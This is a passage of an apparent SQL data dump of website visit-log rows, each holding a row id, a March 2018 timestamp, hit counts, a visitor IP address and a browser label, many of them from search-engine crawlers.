,1522045767,1,1,0,0,'80.252.155.198','chrome'),(226046,1522046039,1,1,0,0,'216.244.66.237','other'),(226047,1522046063,2,2,0,0,'141.8.142.74','other'),(226048,1522046746,1,1,0,0,'178.154.171.88','other'),(226049,1522046967,1,1,0,0,'193.160.224.150','chrome'),(226050,1522048203,3,3,0,0,'46.174.163.134','chrome'),(226051,1522048237,1,1,0,0,'91.196.178.97','chrome'),(226052,1522049112,1,1,0,0,'46.174.163.134','chrome'),(226053,1522049317,1,1,0,0,'178.154.171.88','other'),(226054,1522049480,1,1,0,0,'213.179.252.42','firefox'),(226055,1522049766,2,2,0,0,'91.196.178.77','chrome'),(226056,1522050195,1,1,0,0,'141.8.142.74','other'),(226057,1522050320,1,1,0,0,'91.196.178.74','firefox'),(226058,1522050646,1,1,0,0,'91.196.177.91','chrome'),(226059,1522050799,1,1,0,0,'216.244.66.237','other'),(226060,1522051202,1,1,0,0,'54.67.59.131','chrome'),(226061,1522051326,3,3,0,0,'91.196.178.77','chrome'),(226062,1522051499,1,1,0,0,'8.29.198.27','other'),(226063,1522051605,1,1,0,0,'62.205.134.182','msie'),(226064,1522051714,1,1,0,0,'141.8.142.74','other'),(226065,1522051925,1,1,0,0,'46.201.250.174','chrome'),(226066,1522051929,1,0,1,0,'66.249.69.145',''),(226067,1522052081,2,2,0,0,'195.10.210.70','chrome'),(226068,1522052345,2,2,0,0,'91.196.177.15','chrome'),(226069,1522052795,1,1,0,0,'91.124.182.170','firefox'),(226070,1522052983,2,0,2,0,'66.249.64.28',''),(226071,1522053652,1,1,0,0,'95.27.255.130','chrome'),(226072,1522054171,1,1,0,0,'91.124.182.170','firefox'),(226073,1522054319,1,1,0,0,'66.249.64.30','chrome'),(226074,1522054432,2,2,0,0,'178.154.171.88','other'),(226075,1522054853,1,1,0,0,'141.8.142.74','other'),(226076,1522054876,1,1,0,0,'178.54.192.194','chrome'),(226077,1522055417,1,1,0,0,'95.134.97.244','chrome'),(226078,1522055841,2,2,0,0,'91.196.178.77','chrome'),(226079,1522055972,1,1,0,0,'178.255.215.94','other'),(226080,1522056375,2,2,0,0,'141.8.142.74','other'),(226081,1522056414,1,1,0,0,'95.134.97.244','chrome'),(226082,1522056440,1,1,0,0,'91.196.178.73','chrome'),(226083,1522056458,1,1,0,0,'91.201.180.36','firefox'),(226084,1522056681,1,1,0,0,'40.77.167.67','other'),(226085,1522056701,1,1,0,0,'216.244.66.237','other'),(226086,1522056824,1,1,0,0,'91.196.178.73','firefox'),(226087,1522057284,2,2,0,0,'95.132.14.155','firefox'),(226088,1522057373,1,1,0,0,'91.196.178.73','chrome'),(226089,1522057857,1,1,0,0,'66.249.64.29','chrome'),(226090,1522058195,2,2,0,0,'95.132.14.155','firefox'),(226091,1522058246,1,1,0,0,'91.196.178.97','chrome'),(226092,1522058549,2,2,0,0,'178.154.171.88','other'),(226093,1522058572,3,3,0,0,'141.8.142.74','other'),(226094,1522059018,2,2,0,0,'77.111.244.35','chrome'),(226095,1522059060,1,1,0,0,'178.154.200.41','other'),(226096,1522059087,1,1,0,0,'141.8.142.50','other'),(226097,1522059557,3,3,0,0,'141.8.142.74','other'),(226098,1522059592,1,0,1,0,'66.249.64.29',''),(226099,1522060113,1,1,0,0,'178.154.171.88','other'),(226100,1522060490,1,1,0,0,'91.196.178.97','chrome'),(226101,1522061262,2,2,0,0,'141.8.142.74','other'),(226102,1522061401,1,1,0,0,'91.196.178.89','firefox'),(226103,1522061545,1,0,1,0,'66.249.70.27',''),(226104,1522061639,1,1,0,0,'66.249.64.30','chrome'),(226105,1522061846,2,2,0,0,'91.196.178.168','chrome'),(226106,1522061995,1,0,1,0,'66.249.64.28',''),(226107,1522062024,1,1,0,0,'213.174.21.15','chrome'),(226108,1522062337,1,1,0,0,'8.29.198.25','other'),(226109,1522062339,1,1,0,0,'141.8.142.74','other'),(226110,1522062912,1,0,1,0,'66.249.64.29',''),(226111,1522063103,2,2,0,0,'91.196.178.38','chrome'),(226112,1522063196,1,1,0,0,'178.154.171.88','other'),(226113,1522063211,1,1,0,0,'91.196.178.73','chrome'),(226114,1522063866,2,2,0,0,'62.205.134.182','other'),(226115,1522063929,1,0,1,0,'66.249.64.29',''),(226116,1522064116,1,0,1,0,'66.249.64.30',''),(226117,1522064338,1,1,0,0,'87.250.224.66','other'),(226118,1522064956,1,1,0,0,'37.9.113.182','other'),(226119,1522065216,1,1,0,0,'141.8.142.74','other'),(226120,1522065798,2,2,0,0,'216.244.66.246','other'),(226121,1522065918,72,72,0,0,'173.249.13.106','other'),(226122,1522066051,1,0,1,0,'66.249.64.30',''),(226123,1522066565,1,1,0,0,'62.205.134.182','other'),(226124,1522066673,1,1,0,0,'91.196.178.168','firefox'),(226125,1522066715,1,1,0,0,'37.53.231.45','firefox'),(226126,1522066819,1,0,1,0,'66.249.64.29',''),(226127,1522067108,1,1,0,0,'141.8.142.74','other'),(226128,1522067451,1,1,0,0,'91.196.177.15','chrome'),(226129,1522067796,1,1,0,0,'94.178.225.254','chrome'),(226130,1522067994,1,1,0,0,'46.42.165.164','other'),(226131,1522068112,1,1,0,0,'91.196.178.73','chrome'),(226132,1522068342,1,1,0,0,'178.154.200.45','other'),(226133,1522069059,1,0,1,0,'66.249.64.30',''),(226134,1522069075,1,1,0,0,'178.154.171.88','other'),(226135,1522069129,1,1,0,0,'188.230.43.254','other'),(226136,1522069254,1,1,0,0,'216.244.66.237','other'),(226137,1522069906,2,2,0,0,'141.8.142.74','other'),(226138,1522070108,1,1,0,0,'66.249.70.27','chrome'),(226139,1522070661,1,1,0,0,'91.196.178.93','chrome'),(226140,1522070681,1,1,0,0,'37.55.218.253','chrome'),(226141,1522070757,1,0,1,0,'66.249.64.28',''),(226142,1522071042,2,2,0,0,'141.8.142.74','other'),(226143,1522071558,1,1,0,0,'80.252.154.233','chrome'),(226144,1522071693,3,1,2,0,'66.249.64.29',''),(226145,1522071705,1,0,1,0,'66.249.70.27',''),(226146,1522072282,2,2,0,0,'141.8.142.74','other'),(226147,1522072386,1,1,0,0,'178.154.171.88','other'),(226148,1522072454,1,0,1,0,'66.249.70.25',''),(226149,1522072686,1,1,0,0,'62.205.134.182','other'),(226150,1522073104,2,2,0,0,'91.196.178.77','chrome'),(226151,1522073133,1,1,0,0,'141.8.142.167','other'),(226152,1522073188,1,1,0,0,'8.29.198.25','other'),(226153,1522073259,1,1,0,0,'180.76.15.138','other'),(226154,1522073288,1,1,0,0,'185.11.31.196','chrome'),(226155,1522073352,1,1,0,0,'87.250.224.77','other'),(226156,1522073956,1,1,0,0,'54.165.59.7','other'),(226157,1522074360,2,2,0,0,'141.8.142.74','other'),(226158,1522074883,1,1,0,0,'66.249.64.29','chrome'),(226159,1522075740,2,2,0,0,'77.111.244.66','chrome'),(226160,1522075826,4,4,0,0,'141.8.142.74','other'),(226161,1522077090,1,1,0,0,'77.111.244.34','chrome'),(226162,1522077148,1,0,1,0,'66.249.64.30',''),(226163,1522077207,3,3,0,0,'141.8.142.74','other'),(226164,1522077220,1,1,0,0,'178.154.171.88','other'),(226165,1522077263,1,1,0,0,'107.170.145.187','firefox'),(226166,1522077873,1,1,0,0,'91.196.178.11','chrome'),(226167,1522077886,1,1,0,0,'87.250.224.46','other'),(226168,1522078169,1,1,0,0,'141.8.142.74','other'),(226169,1522078315,2,2,0,0,'178.154.171.88','other'),(226170,1522078674,1,1,0,0,'66.249.81.195','chrome'),(226171,1522079209,1,1,0,0,'87.250.224.46','other'),(226172,1522079613,1,1,0,0,'66.249.64.29','chrome'),(226173,1522079647,1,1,0,0,'77.111.244.32','chrome'),(226174,1522080485,1,1,0,0,'37.9.113.182','other'),(226175,1522080503,2,2,0,0,'141.8.142.74','other'),(226176,1522080735,1,1,0,0,'178.154.171.88','other'),(226177,1522081042,1,0,1,0,'66.249.64.29',''),(226178,1522081443,2,1,1,0,'66.249.64.30',''),(226179,1522081898,1,1,0,0,'216.244.66.237','other'),(226180,1522082011,1,1,0,0,'141.8.142.74','other'),(226181,1522082015,1,1,0,0,'178.154.171.88','other'),(226182,1522082060,1,0,1,0,'66.249.64.29',''),(226183,1522082393,1,0,1,0,'66.249.64.28',''),(226184,1522082505,1,1,0,0,'188.230.43.254','other'),(226185,1522083820,1,0,1,0,'66.249.70.29',''),(226186,1522084037,1,1,0,0,'8.29.198.25','other'),(226187,1522084223,1,1,0,0,'91.196.178.90','firefox'),(226188,1522084617,1,1,0,0,'188.230.43.254','other'),(226189,1522084801,1,1,0,0,'141.8.142.74','other'),(226190,1522084914,1,1,0,0,'37.9.113.110','other'),(226191,1522085996,1,1,0,0,'87.250.224.46','other'),(226192,1522086183,4,4,0,0,'178.92.8.41','chrome'),(226193,1522086365,1,1,0,0,'31.13.106.119','other'),(226194,1522086495,1,1,0,0,'31.13.112.136','other'),(226195,1522086496,1,1,0,0,'31.13.114.76','other'),(226196,1522086512,1,1,0,0,'69.171.240.17','other'),(226197,1522086852,1,1,0,0,'91.232.158.75','other'),(226198,1522087019,1,1,0,0,'188.230.43.254','other'),(226199,1522087246,1,0,1,0,'66.249.64.30',''),(226200,1522087416,1,1,0,0,'178.154.171.88','other'),(226201,1522087664,1,1,0,0,'91.196.178.82','chrome'),(226202,1522087921,1,1,0,0,'194.44.133.195','chrome'),(226203,1522088495,1,1,0,0,'216.244.66.246','other'),(226204,1522089258,1,1,0,0,'40.77.169.27','other'),(226205,1522089269,1,1,0,0,'141.8.142.74','other'),(226206,1522089330,1,1,0,0,'178.154.171.88','other'),(226207,1522089836,1,0,1,0,'66.249.64.29',''),(226208,1522090177,1,1,0,0,'91.209.11.236','other'),(226209,1522090221,2,2,0,0,'91.196.178.29','chrome'),(226210,1522090310,1,1,0,0,'66.249.64.28','chrome'),(226211,1522090951,1,0,1,0,'66.249.64.30',''),(226212,1522090985,1,1,0,0,'95.132.0.226','chrome'),(226213,1522091350,1,1,0,0,'40.77.167.94','other'),(226214,1522091775,1,1,0,0,'34.207.63.209','other'),(226215,1522091821,2,2,0,0,'91.196.178.168','chrome'),(226216,1522091983,1,1,0,0,'40.77.167.67','other'),(226217,1522092618,12,12,0,0,'23.237.4.26','other'),(226218,1522092681,1,1,0,0,'34.207.63.209','other'),(226219,1522092959,1,1,0,0,'178.154.171.88','other'),(226220,1522093605,1,1,0,0,'34.207.63.209','other'),(226221,1522093635,1,1,0,0,'216.244.66.194','other'),(226222,1522093730,2,2,0,0,'54.165.59.7','other'),(226223,1522093899,3,3,0,0,'141.8.142.74','other'),(226224,1522094517,1,1,0,0,'34.207.63.209','other'),(226225,1522094869,1,1,0,0,'8.29.198.25','other'),(226226,1522095166,2,2,0,0,'141.8.142.74','other'),(226227,1522095418,1,1,0,0,'34.207.63.209','other'),(226228,1522096114,1,1,0,0,'141.8.142.74','other'),(226229,1522096341,1,1,0,0,'34.207.63.209','other'),(226230,1522096859,1,1,0,0,'66.249.64.29','chrome'),(226231,1522096875,1,1,0,0,'178.154.200.41','other'),(226232,1522097267,1,1,0,0,'34.207.63.209','other'),(226233,1522097549,1,1,0,0,'54.165.59.7','other'),(226234,1522097647,1,1,0,0,'141.8.142.74','other'),(226235,1522098191,1,1,0,0,'34.207.63.209','other'),(226236,1522098523,1,1,0,0,'178.154.171.88','other'),(226237,1522098701,3,3,0,0,'46.4.87.205','other'),(226238,1522099122,1,1,0,0,'34.207.63.209','other'),(226239,1522099742,1,1,0,0,'141.8.142.74','other'),(226240,1522100042,1,1,0,0,'34.207.63.209','other'),(226241,1522100067,1,1,0,0,'91.209.11.236','other'),(226242,1522100716,2,2,0,0,'141.8.142.74','other'),(226243,1522100866,1,1,0,0,'37.9.113.182','other'),(226244,1522100964,1,1,0,0,'34.207.63.209','other'),(226245,1522101612,2,2,0,0,'91.209.11.236','other'),(226246,1522101653,1,1,0,0,'141.8.142.74','other'),(226247,1522101765,1,1,0,0,'66.249.64.28','chrome'),(226248,1522101920,1,1,0,0,'34.207.63.209','other'),(226249,1522102126,1,0,1,0,'66.249.70.29',''),(226250,1522102371,1,1,0,0,'216.244.66.237','other'),(226251,1522102829,1,1,0,0,'34.207.63.209','other'),(226252,1522103739,1,1,0,0,'34.207.63.209','other'),(226253,1522103971,1,0,1,0,'66.249.64.30',''),(226254,1522104040,1,1,0,0,'216.244.66.237','other'),(226255,1522104352,1,1,0,0,'128.75.52.192','msie'),(226256,1522104509,1,0,1,0,'66.249.70.25',''),(226257,1522104660,1,1,0,0,'34.207.63.209','other'),(226258,1522104929,1,1,0,0,'37.9.113.182','other'),(226259,1522105290,4,4,0,0,'141.8.142.74','other'),(226260,1522105563,1,1,0,0,'34.207.63.209','other'),(226261,1522105678,1,1,0,0,'40.77.167.67','other'),(226262,1522105708,1,1,0,0,'8.29.198.25','other'),(226263,1522106487,1,1,0,0,'34.207.63.209','other'),(226264,1522107362,1,1,0,0,'141.8.142.74','other'),(226265,1522107632,1,1,0,0,'34.207.63.209','other'),(226266,1522107718,1,1,0,0,'216.244.66.237','other'),(226267,1522107966,1,1,0,0,'180.76.15.24','other'),(226268,1522108537,2,2,0,0,'34.207.63.209','other'),(226269,1522109215,1,0,1,0,'66.249.64.29',''),(226270,1522109292,1,1,0,0,'141.8.142.74','other'),(226271,1522109299,1,1,0,0,'66.249.64.28','chrome'),(226272,1522109442,1,1,0,0,'34.207.63.209','other'),(226273,1522110039,1,1,0,0,'216.244.66.237','other'),(226274,1522110335,2,2,0,0,'141.8.142.74','other'),(226275,1522110368,1,1,0,0,'34.207.63.209','other'),(226276,1522110502,1,1,0,0,'180.76.15.160','other'),(226277,1522111290,1,1,0,0,'34.207.63.209','other'),(226278,1522111533,2,2,0,0,'178.154.171.88','other'),(226279,1522112151,1,1,0,0,'40.77.167.91','other'),(226280,1522112193,3,3,0,0,'141.8.142.74','other'),(226281,1522112218,1,1,0,0,'34.207.63.209','other'),(226282,1522112376,1,1,0,0,'46.119.4.201','firefox'),(226283,1522113163,1,1,0,0,'34.207.63.209','other'),(226284,1522113243,2,2,0,0,'141.8.142.74','other'),(226285,1522114082,1,1,0,0,'34.207.63.209','other'),(226286,1522114502,1,0,1,0,'66.249.64.28',''),(226287,1522114799,1,1,0,0,'141.8.142.74','other'),(226288,1522115002,1,1,0,0,'34.207.63.209','other'),(226289,1522115589,1,0,1,0,'66.249.64.29',''),(226290,1522115802,1,1,0,0,'87.250.224.46','other'),(226291,1522115919,1,1,0,0,'34.207.63.209','other'),(226292,1522116050,1,1,0,0,'188.255.20.68','other'),(226293,1522116206,1,1,0,0,'178.154.171.88','other'),(226294,1522116379,1,1,0,0,'141.8.142.74','other'),(226295,1522116538,1,1,0,0,'8.29.198.27','other'),(226296,1522116747,1,1,0,0,'216.244.66.237','other'),(226297,1522116824,1,1,0,0,'34.207.63.209','other'),(226298,1522117151,1,1,0,0,'66.249.64.28','chrome'),(226299,1522117746,1,1,0,0,'34.207.63.209','other'),(226300,1522118017,1,1,0,0,'40.77.167.91','other'),(226301,1522118665,1,1,0,0,'34.207.63.209','other'),(226302,1522118764,2,2,0,0,'95.213.141.126','opera'),(226303,1522119098,1,1,0,0,'178.154.171.88','other'),(226304,1522119336,2,2,0,0,'141.8.142.74','other'),(226305,1522119346,1,1,0,0,'87.250.224.46','other'),(226306,1522119465,1,1,0,0,'216.244.66.237','other'),(226307,1522119540,1,1,0,0,'40.77.167.91','other'),(226308,1522119570,1,1,0,0,'34.207.63.209','other'),(226309,1522120488,1,1,0,0,'34.207.63.209','other'),(226310,1522121409,1,1,0,0,'34.207.63.209','other'),(226311,1522121719,1,1,0,0,'141.8.142.74','other'),(226312,1522122329,1,1,0,0,'34.207.63.209','other'),(226313,1522123251,1,1,0,0,'34.207.63.209','other'),(226314,1522123639,1,1,0,0,'87.250.224.46','other'),(226315,1522123675,1,1,0,0,'141.8.142.74','other'),(226316,1522123929,1,1,0,0,'37.9.113.138','other'),(226317,1522123934,1,1,0,0,'5.45.207.49','other'),(226318,1522123953,1,1,0,0,'37.9.113.186','other'),(226319,1522124163,1,1,0,0,'34.207.63.209','other'),(226320,1522125085,1,1,0,0,'34.207.63.209','other'),(226321,1522126006,1,1,0,0,'34.207.63.209','other'),(226322,1522126420,2,2,0,0,'178.154.171.88','other'),(226323,1522126484,1,1,0,0,'212.83.178.172','chrome'),(226324,1522126541,1,1,0,0,'141.8.142.74','other'),(226325,1522126855,1,1,0,0,'216.244.66.246','other'),(226326,1522126857,1,0,1,0,'66.249.66.195',''),(226327,1522126946,1,1,0,0,'34.207.63.209','other'),(226328,1522127391,1,1,0,0,'8.29.198.27','other'),(226329,1522127670,1,1,0,0,'37.9.113.182','other'),(226330,1522127722,1,1,0,0,'141.8.132.19','other'),(226331,1522127874,1,1,0,0,'34.207.63.209','other'),(226332,1522128411,1,1,0,0,'77.111.244.47','chrome'),(226333,1522128677,1,1,0,0,'87.250.224.46','other'),(226334,1522128755,1,0,1,0,'66.249.66.199',''),(226335,1522128787,1,1,0,0,'34.207.63.209','other'),(226336,1522128852,1,1,0,0,'207.46.13.33','other'),(226337,1522129766,1,1,0,0,'34.207.63.209','other'),(226338,1522129902,2,2,0,0,'91.196.178.77','chrome'),(226339,1522130188,2,2,0,0,'178.154.171.88','other'),(226340,1522130229,1,1,0,0,'91.196.178.164','chrome'),(226341,1522130291,1,1,0,0,'195.10.210.70','firefox'),(226342,1522130673,1,1,0,0,'34.207.63.209','other'),(226343,1522131035,1,1,0,0,'66.249.66.201','chrome'),(226344,1522131597,1,1,0,0,'34.207.63.209','other'),(226345,1522131630,1,1,0,0,'37.9.113.60','other'),(226346,1522131766,1,1,0,0,'141.8.142.74','other'),(226347,1522132526,1,1,0,0,'34.207.63.209','other'),(226348,1522133361,1,1,0,0,'46.133.170.58','chrome'),(226349,1522133441,1,1,0,0,'34.207.63.209','other'),(226350,1522133649,1,1,0,0,'91.124.182.170','firefox'),(226351,1522133851,2,2,0,0,'91.196.177.46','chrome'),(226352,1522134030,1,1,0,0,'91.196.177.15','chrome'),(226353,1522134105,1,1,0,0,'141.8.142.74','other'),(226354,1522134347,1,1,0,0,'37.9.113.115','other'),(226355,1522134351,1,1,0,0,'91.196.179.138','chrome'),(226356,1522134364,1,1,0,0,'34.207.63.209','other'),(226357,1522135287,1,1,0,0,'34.207.63.209','other'),(226358,1522136206,1,1,0,0,'34.207.63.209','other'),(226359,1522136288,1,1,0,0,'178.154.171.88','other'),(226360,1522136494,1,1,0,0,'91.196.178.163','chrome'),(226361,1522136796,1,1,0,0,'178.154.200.45','other'),(226362,1522137126,1,1,0,0,'34.207.63.209','other'),(226363,1522137409,1,1,0,0,'92.113.3.141','firefox'),(226364,1522138060,1,1,0,0,'34.207.63.209','other'),(226365,1522138148,3,3,0,0,'5.9.111.70','other'),(226366,1522138231,1,1,0,0,'8.29.198.27','other'),(226367,1522138334,2,2,0,0,'95.216.20.16','other'),(226368,1522138653,1,1,0,0,'207.46.13.180','other'),(226369,1522138943,2,2,0,0,'141.8.142.74','other'),(226370,1522138963,1,1,0,0,'34.207.63.209','other'),(226371,1522139546,1,1,0,0,'180.76.15.153','other'),(226372,1522139698,1,1,0,0,'40.77.167.34','other'),(226373,1522139886,1,1,0,0,'34.207.63.209','other'),(226374,1522140569,1,1,0,0,'91.196.177.46','chrome'),(226375,1522140809,1,1,0,0,'34.207.63.209','other'),(226376,1522140823,1,1,0,0,'107.21.1.8','other'),(226377,1522141304,1,1,0,0,'216.244.66.237','other'),(226378,1522141317,2,2,0,0,'54.165.59.7','other'),(226379,1522141722,1,1,0,0,'34.207.63.209','other'),(226380,1522141763,1,1,0,0,'94.178.105.75','chrome'),(226381,1522142181,1,1,0,0,'94.231.176.254','chrome'),(226382,1522142311,2,2,0,0,'77.111.244.19','chrome'),(226383,1522142636,1,1,0,0,'34.207.63.209','other'),(226384,1522142752,1,1,0,0,'193.194.127.207','chrome'),(226385,1522143023,3,3,0,0,'130.180.220.193','chrome'),(226386,1522143158,2,2,0,0,'40.77.167.34','other'),(226387,1522143192,1,1,0,0,'212.82.217.5','other'),(226388,1522143338,1,1,0,0,'77.111.244.19','chrome'),(226389,1522143560,1,1,0,0,'34.207.63.209','other'),(226390,1522143779,1,1,0,0,'216.244.66.237','other'),(226391,1522143995,2,2,0,0,'178.154.171.88','other'),(226392,1522144047,1,1,0,0,'130.180.220.193','chrome'),(226393,1522144215,3,3,0,0,'82.207.121.233','chrome'),(226394,1522144480,1,1,0,0,'34.207.63.209','other'),(226395,1522145368,1,1,0,0,'141.8.142.74','other'),(226396,1522145383,1,1,0,0,'34.207.63.209','other'),(226397,1522145776,1,0,1,0,'66.249.66.158',''),(226398,1522146307,1,1,0,0,'34.207.63.209','other'),(226399,1522146472,1,1,0,0,'141.8.142.74','other'),(226400,1522146477,1,1,0,0,'178.154.200.41','other'),(226401,1522147229,1,1,0,0,'34.207.63.209','other'),(226402,1522147300,1,1,0,0,'141.8.132.19','other'),(226403,1522148028,1,1,0,0,'141.8.142.74','other'),(226404,1522148148,1,1,0,0,'34.207.63.209','other'),(226405,1522149069,1,1,0,0,'8.29.198.27','other'),(226406,1522149074,1,1,0,0,'34.207.63.209','other'),(226407,1522149164,2,2,0,0,'130.180.220.193','chrome'),(226408,1522149875,1,1,0,0,'91.196.178.76','firefox'),(226409,1522149995,1,1,0,0,'34.207.63.209','other'),(226410,1522150188,1,1,0,0,'92.113.20.189','chrome'),(226411,1522150914,1,1,0,0,'34.207.63.209','other'),(226412,1522151041,1,1,0,0,'141.8.142.74','other'),(226413,1522151154,1,1,0,0,'95.132.54.71','firefox'),(226414,1522151418,1,1,0,0,'178.154.171.88','other'),(226415,1522151588,1,1,0,0,'91.203.26.166','chrome'),(226416,1522151818,1,1,0,0,'34.207.63.209','other'),(226417,1522152107,1,1,0,0,'178.93.192.245','chrome'),(226418,1522152508,1,1,0,0,'77.111.244.66','chrome'),(226419,1522152665,2,2,0,0,'91.196.178.77','chrome'),(226420,1522152735,1,1,0,0,'34.207.63.209','other'),(226421,1522152791,1,1,0,0,'178.154.171.88','other'),(226422,1522152943,1,1,0,0,'94.231.176.254','chrome'),(226423,1522153457,1,1,0,0,'207.46.13.33','other'),(226424,1522153653,1,1,0,0,'34.207.63.209','other'),(226425,1522153772,2,2,0,0,'91.196.179.25','chrome'),(226426,1522154575,1,1,0,0,'34.207.63.209','other'),(226427,1522154703,2,2,0,0,'46.211.104.34','chrome'),(226428,1522154721,1,1,0,0,'91.196.179.25','chrome'),(226429,1522154898,1,1,0,0,'216.244.66.237','other'),(226430,1522155385,1,1,0,0,'141.8.142.74','other'),(226431,1522155495,1,1,0,0,'34.207.63.209','other'),(226432,1522156396,1,1,0,0,'91.196.178.133','chrome'),(226433,1522156397,1,1,0,0,'34.207.63.209','other'),(226434,1522156437,1,1,0,0,'216.244.66.237','other'),(226435,1522156675,1,1,0,0,'78.111.187.58','chrome'),(226436,1522157146,1,1,0,0,'91.202.144.114','chrome'),(226437,1522157293,2,2,0,0,'91.196.178.77','chrome'),(226438,1522157318,1,1,0,0,'34.207.63.209','other'),(226439,1522157392,2,2,0,0,'141.8.142.74','other'),(226440,1522157778,1,1,0,0,'37.54.197.19','chrome'),(226441,1522158247,1,1,0,0,'34.207.63.209','other'),(226442,1522158512,2,0,2,0,'66.249.66.195',''),(226443,1522158639,1,1,0,0,'92.112.125.243','chrome'),(226444,1522158750,1,1,0,0,'178.154.171.88','other'),(226445,1522158847,1,1,0,0,'141.8.142.74','other'),(226446,1522158859,1,1,0,0,'168.235.201.253','chrome'),(226447,1522158892,1,1,0,0,'193.194.108.1','firefox'),(226448,1522158935,5,5,0,0,'91.196.178.77','chrome'),(226449,1522159148,1,1,0,0,'34.207.63.209','other'),(226450,1522159323,1,1,0,0,'66.249.66.158','chrome'),(226451,1522159430,1,1,0,0,'91.219.221.34','chrome'),(226452,1522159636,1,1,0,0,'207.46.13.33','other'),(226453,1522159818,1,1,0,0,'178.154.171.88','other'),(226454,1522159909,1,1,0,0,'8.29.198.26','other'),(226455,1522160055,1,1,0,0,'34.207.63.209','other'),(226456,1522160343,1,1,0,0,'35.226.23.240','other'),(226457,1522160355,1,1,0,0,'188.230.43.254','other'),(226458,1522160461,1,1,0,0,'95.134.97.244','chrome'),(226459,1522160903,2,2,0,0,'91.196.178.38','chrome'),(226460,1522160956,1,1,0,0,'141.8.142.74','other'),(226461,1522160973,1,1,0,0,'34.207.63.209','other'),(226462,1522161142,1,1,0,0,'216.244.66.237','other'),(226463,1522161370,1,1,0,0,'77.111.244.22','chrome'),(226464,1522161376,1,1,0,0,'77.111.244.64','chrome'),(226465,1522161894,1,1,0,0,'34.207.63.209','other'),(226466,1522162202,1,1,0,0,'91.196.178.38','chrome'),(226467,1522162511,1,1,0,0,'178.95.247.83','chrome'),(226468,1522162547,1,1,0,0,'141.8.142.74','other'),(226469,1522162733,1,1,0,0,'188.230.43.254','other'),(226470,1522162812,1,1,0,0,'34.207.63.209','other'),(226471,1522163633,1,1,0,0,'91.196.178.76','firefox'),(226472,1522163718,1,1,0,0,'34.207.63.209','other'),(226473,1522164033,1,1,0,0,'141.8.142.74','other'),(226474,1522164408,1,1,0,0,'185.29.8.136','other'),(226475,1522164427,1,1,0,0,'66.249.66.157','chrome'),(226476,1522164515,1,1,0,0,'178.154.171.88','other'),(226477,1522164640,1,1,0,0,'34.207.63.209','other'),(226478,1522164742,1,1,0,0,'216.244.66.237','other'),(226479,1522165558,1,1,0,0,'34.207.63.209','other'),(226480,1522165737,1,1,0,0,'188.230.43.254','other'),(226481,1522165788,1,0,1,0,'66.249.66.199',''),(226482,1522166347,1,1,0,0,'216.244.66.246','other'),(226483,1522166476,1,1,0,0,'34.207.63.209','other'),(226484,1522167039,1,1,0,0,'141.8.142.74','other'),(226485,1522167308,1,1,0,0,'216.244.66.237','other'),(226486,1522167380,1,1,0,0,'34.207.63.209','other'),(226487,1522167830,1,1,0,0,'178.154.171.88','other'),(226488,1522168132,1,1,0,0,'188.230.43.254','other'),(226489,1522168284,1,1,0,0,'216.244.66.237','other'),(226490,1522168304,1,1,0,0,'34.207.63.209','other'),(226491,1522168544,1,1,0,0,'180.76.15.22','other'),(226492,1522169194,1,1,0,0,'207.46.13.33','other'),(226493,1522169342,1,1,0,0,'34.207.63.209','other'),(226494,1522170252,1,1,0,0,'34.207.63.209','other'),(226495,1522170537,1,1,0,0,'188.230.43.254','other'),(226496,1522170767,1,1,0,0,'8.29.198.27','other'),(226497,1522170924,2,2,0,0,'141.8.142.74','other'),(226498,1522171164,1,1,0,0,'34.207.63.209','other'),(226499,1522171933,1,1,0,0,'216.244.66.237','other'),(226500,1522172083,1,1,0,0,'34.207.63.209','other'),(226501,1522173001,1,1,0,0,'34.207.63.209','other'),(226502,1522173438,2,2,0,0,'91.196.178.48','chrome'),(226503,1522173465,1,1,0,0,'216.244.66.194','other'),(226504,1522173877,1,1,0,0,'180.76.15.15','other'),(226505,1522173926,1,1,0,0,'34.207.63.209','other'),(226506,1522174497,1,1,0,0,'141.8.142.74','other'),(226507,1522174855,1,1,0,0,'34.207.63.209','other'),(226508,1522175773,1,1,0,0,'34.207.63.209','other'),(226509,1522175855,1,1,0,0,'141.8.142.74','other'),(226510,1522175910,1,0,1,0,'66.249.66.195',''),(226511,1522176212,1,1,0,0,'91.244.21.136','chrome'),(226512,1522176922,1,1,0,0,'216.244.66.237','other'),(226513,1522177517,1,1,0,0,'178.154.171.88','other'),(226514,1522177867,1,1,0,0,'141.8.142.74','other'),(226515,1522178226,2,2,0,0,'91.196.178.165','chrome'),(226516,1522178943,1,1,0,0,'178.154.171.88','other'),(226517,1522179216,1,0,1,0,'66.249.66.201',''),(226518,1522179668,1,1,0,0,'213.179.252.233','chrome'),(226519,1522180282,1,0,1,0,'66.249.66.199',''),(226520,1522180865,1,1,0,0,'216.244.66.194','other'),(226521,1522181109,2,2,0,0,'91.196.178.9','chrome'),(226522,1522181389,1,1,0,0,'178.154.171.88','other'),(226523,1522181618,1,1,0,0,'8.29.198.25','other'),(226524,1522182490,1,0,1,0,'66.249.66.201',''),(226525,1522182795,1,1,0,0,'141.8.142.74','other'),(226526,1522183486,1,0,1,0,'66.249.66.157',''),(226527,1522183896,3,3,0,0,'141.8.142.74','other'),(226528,1522183907,1,1,0,0,'207.46.13.157','other'),(226529,1522184605,2,2,0,0,'216.244.66.237','other'),(226530,1522185610,1,1,0,0,'216.244.66.237','other'),(226531,1522185732,1,1,0,0,'178.154.171.88','other'),(226532,1522185782,1,1,0,0,'35.226.23.240','other'),(226533,1522185811,2,2,0,0,'141.8.142.74','other'),(226534,1522188001,1,1,0,0,'216.244.66.194','other'),(226535,1522188343,1,1,0,0,'37.9.113.110','other'),(226536,1522188465,2,2,0,0,'178.154.171.88','other'),(226537,1522189079,1,1,0,0,'91.196.178.51','chrome'),(226538,1522190998,44,44,0,0,'66.70.182.117','chrome'),(226539,1522191376,1,0,1,0,'66.249.70.25',''),(226540,1522191417,1,1,0,0,'66.249.64.28','chrome'),(226541,1522192454,1,1,0,0,'8.29.198.26','other'),(226542,1522194304,1,1,0,0,'207.46.13.8','other'),(226543,1522196010,1,1,0,0,'141.8.142.74','other'),(226544,1522196365,1,1,0,0,'37.9.113.157','other'),(226545,1522196823,1,1,0,0,'216.244.66.237','other'),(226546,1522197157,1,1,0,0,'87.250.224.85','other'),(226547,1522198753,1,1,0,0,'35.226.23.240','other'),(226548,1522199748,1,1,0,0,'216.244.66.237','other'),(226549,1522200096,1,1,0,0,'66.249.64.28','chrome'),(226550,1522200360,1,0,1,0,'66.249.64.29',''),(226551,1522202677,1,1,0,0,'141.8.142.74','other'),(226552,1522203171,2,2,0,0,'216.244.66.237','other'),(226553,1522203299,1,1,0,0,'8.29.198.27','other'),(226554,1522203554,18,18,0,0,